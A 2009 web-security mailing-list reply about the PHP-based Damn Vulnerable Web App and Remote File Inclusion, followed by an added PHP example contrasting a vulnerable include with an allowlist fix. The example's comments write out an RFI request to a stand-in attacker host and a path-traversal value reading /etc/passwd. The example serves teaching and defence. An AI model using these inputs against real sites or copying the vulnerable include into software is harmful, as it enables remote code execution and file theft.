List: websecurity
Subject: Re: [WEB SECURITY] Damn Vulnerable Web App
From: Stephan Wehner <stephanwehner () gmail ! com>
Date: 2009-05-31 19:28:00
Message-ID: e66d1efb0905311228s2b2d9cc6v48f5eec520036dd8 () mail ! gmail ! com
2009/5/29 MustLive <mustlive@websecurity.com.ua>:
> Hello Stephan!
>
> You wrote a nice comment about Ryan's DVWA project and I've made some comments
> on yours.
>
>> Any particular reason it is implemented in PHP ??
>
> I see two reasons why Ryan developed his project in PHP.
>
> 1. He has programming knowledge of PHP (so he decided to use it).
>
> 2. The PHP language has a lot of built-in features which are used by developers
> and make a lot of attack vectors. And for this reason PHP is liked by
> hackers (I mean PHP web apps full of holes) and this is why PHP web
> apps are very widespread in bugtracks.
>
> The 2nd reason is even more important than the 1st one :-). Especially for
> unique features of the PHP language which are liked by hackers, such as Remote
> File Inclusion. For this one alone there was a reason to make DVWA in PHP.
>
> Do you know any other programming language (which is used for web app
> development) that has such an ability (only server-side) - to include files
> remotely? Because I don't know any other such language (from all the
> web-oriented programming languages which I know). Only PHP has such a feature
> and has RFI holes in web apps in this language ;-).
Well, I may be misunderstanding, but could such a feature be emulated
in another language? That way these kinds of holes may be controlled,
with a predictable interface and all in all more secure :-)
Stephan
--
Stephan Wehner
-> http://stephan.sugarmotor.org (blog and homepage)
-> http://www.thrackle.org
-> http://www.buckmaster.ca
-> http://www.trafficlife.com
-> http://stephansmap.org -- http://blog.stephansmap.org
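The Remote File Inclusion pattern the thread is arguing about, shown as an added example (not code from the thread, from DVWA, or from either poster): the classic vulnerable `include` of a request parameter, next to a hardened version that maps the parameter onto a fixed list of local files. The `pages/` directory, the `page` parameter and the `ALLOWED_PAGES` map are assumptions of this example; the code targets PHP 7 or later.

```php
<?php
// Added example, not from the original thread or from DVWA.
// Assumes a pages/ directory containing home.php and about.php.

// VULNERABLE: the client controls what include() loads.
// With allow_url_include=On (or PHP < 5.2, where allow_url_fopen=On was
// enough) a request such as
//     ?page=http://attacker.example/shell.txt
// makes PHP fetch and execute remote code (RFI). Even with URL wrappers
// disabled the same line still allows local file inclusion via
//     ?page=../../../../etc/passwd%00   (null byte trick, PHP < 5.3.4)
function render_vulnerable(string $page): void
{
    include $page . '.php';   // do not do this
}

// HARDENED: the user-supplied value is only ever used as a lookup key.
// The raw string never reaches include(), so neither a URL nor a path
// can be injected; unknown keys are rejected.
const ALLOWED_PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;
}

function render_safe(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

render_safe($_GET['page'] ?? 'home');
```

Note that the allowlist is the actual fix; the php.ini knobs are defence in depth. PHP 5.2 split `allow_url_include` (default Off) out of `allow_url_fopen`, so on a current interpreter the remote part of this bug only fires if an administrator turns it on, but the local inclusion half of `render_vulnerable()` works regardless of either setting.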